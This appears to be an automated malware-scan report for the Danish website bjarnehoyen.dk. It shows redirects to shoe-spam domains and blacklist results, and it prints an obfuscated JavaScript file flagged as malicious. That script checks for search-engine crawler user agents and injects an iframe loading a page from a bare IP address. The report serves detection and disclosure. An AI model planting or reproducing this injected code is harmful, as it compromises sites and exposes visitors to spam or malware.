Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://www.bjarnehoyen.dk/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: www.bjarnehoyen.dk Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Object moved Cache-Control: private Date: Wed, 17 Sep 2014 07:28:24 GMT Location: http://nikefreedk.whichbegforthatsort.info/ Server: Microsoft-IIS/6.0 Content-Length: 164 Content-Type: text/html Set-Cookie: ASPSESSIONIDSAQDQTDD=BMLBDEIALHABLFAIHDNNOPNL; path=/ X-Powered-By: ASP.NET | malicious |
URL: http://nikefreedk.whichbegforthatsort.info/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: nikefreedk.whichbegforthatsort.info Referer: http://www.google.com/search?q=redirect+check2 | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 17 Sep 2014 07:28:26 GMT Location: http://www.freerunningskodame.com/ Server: Apache/2 Content-Length: 329 Content-Type: text/html; charset=iso-8859-1 | suspicious |
Scanned pages/files
Request | Server response | Status |
http://www.bjarnehoyen.dk/ | 200 OK Content-Length: 26732 Content-Type: text/html | clean |
http://www.bjarnehoyen.dk/berlin-filer\image2931.js | 200 OK Content-Length: 987 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var HbgHGa1 = 0;var UFFC2 = navigator["\x75\x73\x65\x72\x41\x67\x65\x6e\x74"];UFFC2 = UFFC2["\x74\x6f\x4c\x6f\x77\x65\x72\x43\x61\x73\x65"]();var cZOEmDCvK3 = new window["\x41\x72\x72\x61\x79"]();cZOEmDCvK3[1] = '\x67\x6f\x6f\x67\x6c\x65\x62\x6f\x74';cZOEmDCvK3[2] = '\x61\x6f\x6c';cZOEmDCvK3[3] = '\x61\x73\x6b';cZOEmDCvK3[4] = '\x79\x61\x68\x6f\x6f';cZOEmDCvK3[5] = '\x62\x69\x6e\x67';for(k in cZOEmDCvK3){ if(UFFC2["\x69\x6e\x64\x65\x78\x4f\x66"](cZOEmDCvK3[k])>0) { HbgHGa1 = 1; break; }}if(HbgHGa1==1){ window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x69\x66\x72\x61\x6d\x65 \x73\x72\x63\x3d\"\x68\x74\x74\x70\x3a\x2f\x2f\x39\x38\x2e\x31\x35\x39\x2e\x31\x30\x35\x2e\x36\x30\x2f\x6c\x6b\x33\x2e\x68\x74\x6d\x6c\" \x73\x63\x72\x6f\x6c\x6c\x69\x6e\x67\x3d\"\x6e\x6f\" \x66\x72\x61\x6d\x65\x62\x6f\x72\x64\x65\x72\x3d\x30 \x77\x69\x64\x74\x68\x3d\"\x39\x30\x30\" \x68\x65\x69\x67\x68\x74\x3d\"\x34\x38\x30\"\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e");} Antivirus reports:
| ||
http://www.bjarnehoyen.dk/test404page.js | 404 Not Found Content-Length: 1635 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=bjarnehoyen.dk
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://bjarnehoyen.dk/
Result: bjarnehoyen.dk is not infected or malware details are not published yet.
Result: bjarnehoyen.dk is not infected or malware details are not published yet.